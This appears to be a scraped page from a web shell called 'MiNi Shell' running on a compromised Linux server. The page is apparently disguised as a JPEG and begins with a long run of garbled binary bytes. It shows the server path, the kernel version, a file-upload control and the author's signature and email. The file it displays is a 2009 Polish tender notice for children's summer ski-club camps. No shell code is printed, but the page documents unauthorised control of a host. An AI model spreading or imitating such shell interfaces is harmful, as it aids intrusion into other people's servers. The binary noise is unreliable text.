JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/125054-N-2009.html

<p class="kh_header"><b>Kraków: Organizacja turnusów wypoczynkowych w ramach 
SPORTOWYCH WAKACJI 2009</b><br>
<b>Numer ogłoszenia: 125054 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polski Związek Narciarski , ul. Mieszczańska 18/3, 30-313 Kraków, woj. małopolskie, tel. 012 2609970, 2609972, faks 012 2697112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Związek Sportowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja turnusów wypoczynkowych w ramach 
SPORTOWYCH WAKACJI 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje organizację trzech turnusów wypoczynkowych 14-dniowych (początek turnusu: kolacja w dniu przyjazdu, zakończenie turnusu: obiad w dniu wyjazdu + suchy prowiant na czas podróży powrotnej) łącznie dla 314 dzieci - zawodników uczniowskich klubów sportowych w konkurencjach: narciarstwo klasyczne i narciarstwo alpejskie w wieku 10 - 15 lat wraz z trenerami - opiekunami (łącznie 30 os.) oraz kierownikami turnusów (łącznie 3 os.) w ramach Sportowych Wakacji 2009 w okresie od 28 czerwca 2009 r. do 11 sierpnia 2009 r. 

SZCZEGÓŁOWY HARMONOGRAM TURNUSÓW:

Nr turnusu	Czas trwania	zawodnicy                ilość	trenerzy 
 ilość 	kierownik turnusu           ilość 	Ogółem ilość
I	28.06  -  12.07.2009	105	10	1	116
II	13.07  -  27.07.2009	105	10	1	116
III	28.07  -  11.08.2009	104	10	1	115
 	Razem 	314	30	3	347

	SZCZEGÓŁOWY ZAKRES ZAMÓWIENIA:
Całodzienne wyżywienie (4 posiłki w tym podwieczorek, tzw. suchy prowiant na czas podróży powrotnej)
Zakwaterowanie w (wariantowo): 
- domkach campingowych z pełnym węzłem sanitarnym, 
- domach wypoczynkowych (pensjonat) z pełnym węzłem sanitarnym, 
- pawilonach z pełnym węzłem sanitarnym, 
- internat szkolny z pełnym zapleczem sanitarnym, 
w pokojach max. 10 - osobowych, dla kadry trenerskiej pokoje 2- osobowe, 
Lokalizacja ośrodka: do 1000 metrów od morza, bezpłatny, nieograniczony dostęp do zorganizowanego kąpieliska z plażą strzeżoną, 
Korzystanie z obiektów sportowych:
- boisko wielofunkcyjne nawierzchnia naturalna (trawa) lub syntetyczna - 2 -6 godz na dzień 
- hala sportowa - 2-4 godz na dzień,  wg. potrzeb, po uzgodnieniu z  kierownictwem turnusu ,
- w przypadku dostępu do jeziora: inny sprzęt sportowo-rekreacyjny (kajaki, łódki, rowery wodne wraz z kapokami/ wg. potrzeb, po uzgodnieniu z  kierownictwem turnusu) 
Korzystanie ze sprzętu sportowego:
	Rodzaj		Ilość		Czas
	Piłki do gier zespołowych, stoły do tenisa stołowego, 		 10 piłek do p.siatkowej,
	5 piłek do p.nożnej, 
	4 piłki do kosza,
	2-4 stoły do tenisa stołowego, 		wg. potrzeb, po uzgodnieniu z  kierownictwem turnusu 
	
Korzystanie ze sprzętu audio - video:
	Rodzaj		Ilość		Czas
	TV, video, DVD, sprzęt audio (umożliwiający organizację dyskotek) 		1 komplet / TV, video, DVD  sprzęt audio (umożliwiający organizację dyskotek)		Do dyspozycji podczas całego turnusu
	
Inny sprzęt:
	Rodzaj		Ilość		Czas
	Rowery		 20 - 25 sztuk  		Do dyspozycji podczas całego turnusu, wg potrzeb poszczególnych trenerów

Zapewnienie całodobowej opieki medycznej, (pielęgniarka 24 godz na dobę, lekarz na wezwanie)
Zabezpieczenie opieki Ratownika WOPR na plaży strzeżonej wg. potrzeb zgłoszonych przez kierownika turnusu
Organizacja  1 wycieczki do ciekawego miejsca w okolicy wraz z opieką pilota dla każdego turnusu,
Organizacja 2 ognisk z pieczeniem kiełbasek
Organizacja dyskotek wg. uznania kierowników turnusów

SZCZEGÓŁOWA INFORMACJA DOTYCZACA KALKULACJI KOSZTÓW:
Termin	Ilość uczestników	Koszt osobodnia
28.06  -  12.07.2009	105+10+1	
13.07  -  27.07.2009	105+10+1	
28.07  -  11.08.2009	104+10+1	Nie wyższy niż 55,00 zł  
z VAT*
RAZEM	               314+ 30+ 3	
* UWAGA:
1) w przypadku uczestników ( 314) do 25,00 zł na os. na dzień pokrywa PZN, pozostałą kwotę pokrywa uczestnik
2) w przypadku trenerów (30 ) do 25,00 zł na os. na dzień pokrywa PZN, pozostałą kwotę pokrywa oferent,
3) w przypadku kierowników (3) całość kosztów pokrywa oferent,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy oraz spełniający wymogi określone w art. 22 ust. 1 ustawy.
6.1. Wykonawca jest zobowiązany złożyć w ofercie
W celu potwierdzenia, że posiada uprawnienia do wykonywania określonej działalności lub czynności oraz że nie podlega wykluczeniu na podstawie art. 24 ustawy
6.1.1. Oświadczenie Wykonawcy, wypełnione i podpisane odpowiednio przez  osoby upoważnione do reprezentowania Wykonawcy albo przez Pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia (załącznik nr 2a lub 2b  do SIWZ).
6.1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku zaświadczenia o wpisie do ewidencji działalności gospodarczej oznacza to, że powinno ono być wydane w trybie opisanym w dziale VII kodeksu postępowania administracyjnego, samo stwierdzenie przez właściwy organ zgodności z oryginałem z podaniem daty nie spełnia wymogów ustawy (nie jest wydaniem zaświadczenia).
6.1.3. Aktualną kartę kwalifikacyjną obiektu, zatwierdzoną przez Kuratora Oświaty na akcję letnią 2009 r. wraz ze zgodą właściwego terenowo burmistrza lub wójta i pozytywną opinią państwowego inspektora sanitarnego i Komendy Rejonowej Straży Pożarnej. Karta może być przedłożona wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza
Inne dokumenty wymagane w ofercie
 6.1.4. Wypełniony i podpisany przez osoby uprawnione Formularz oferty według druku stanowiącego załącznik nr 3 do specyfikacji.
6.1.5. Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej. Dokument stwierdzający ustanowienie pełnomocnika podlega opłacie skarbowej, zgodnie z art. 1 ust. 2 lit. a ustawy z dnia 9 września 2000 r. o opłacie skarbowej (Dz. U. z 2004 r. Nr 253, poz. 2532 z późn. zm.). Pełnomocnictwo do dokonania czynności, dla której ważności wymagana jest forma szczególna, powinno być udzielone w tej samej formie. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza. 
6.2. Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu wykonawców mających siedzibę lub miejsce zamieszkania za granicą.
6.2.1. Gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w punkcie 6.1.2. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że
nie otwarto jego likwidacji ani nie ogłoszono upadłości,
nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
6.2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa punkcie 6.2.1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
6.3. Forma dokumentów.
Wszystkie dokumenty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania wykonawcy na każdej zapisanej stronie poświadczanego dokumentu. Pełnomocnictwo musi być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, poświadczenia za zgodność z oryginałem winien dokonać Pełnomocnik. 
Jeżeli załączona do oferty kserokopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, a zamawiający nie może sprawdzić jej prawdziwości w inny sposób, może on zażądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu. 
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez osoby upoważnione do reprezentowania Wykonawcy.
6.4. Ocena spełniania warunków udziału w postępowaniu Wykonawców zostanie dokonana w oparciu o dokumenty, o których mowa w pkt. 6.1.1 do 6.1.3 SIWZ.
VII. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust.1 ustawy.
7.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie konsorcjum) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
7.2. W takim przypadku, oprócz dokumentów wymienionych w pkt. 6.1. specyfikacji wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt. 7.1. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Dokument stwierdzający ustanowienie pełnomocnika podlega opłacie skarbowej, zgodnie z art. 1 ust. 2 lit. a ustawy z dnia 9 września 2000r. o opłacie skarbowej (Dz. U. z 2004 r. Nr 253, poz. 2532 z późn. zm.). Pełnomocnictwo do dokonania czynności, dla której ważności wymagana jest forma szczególna, powinno być udzielone w tej samej formie. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza. 
7.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają (podpisane przez ustanowionego Pełnomocnika lub potwierdzone przez niego za zgodność z oryginałem)
7.3.1. każdy z osobna, dotyczący ich dokument wymieniony w punkcie 6.1.2. SIWZ,
7.3.2. zamiast Oświadczenia Wykonawcy (pkt. 6.1.1. SIWZ) wg zał. 2a do specyfikacji, Oświadczenie Pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia, wg załącznika 2b do specyfikacji. Pełnomocnik podpisuje także dokument, o którym mowa w pkt 6.1.3 (Formularz Oferty)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Ocena spełniania warunków udziału w postęowaniu Wykonawców zostanie dokonana w oparciu o dokumenty, o których mowa w pkt. 6.1.1 do 6.1.3 SIWZ, tj.,
1) Oświadczenie Wykonawcy
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej
3) Aktualna karta kwalifikacyjna obiektu.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pzn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Mieszczańska 18/3, 30-313 Kraków.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 16:00, miejsce: ul. Mieszczańska 18/3, 30-313 Kraków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com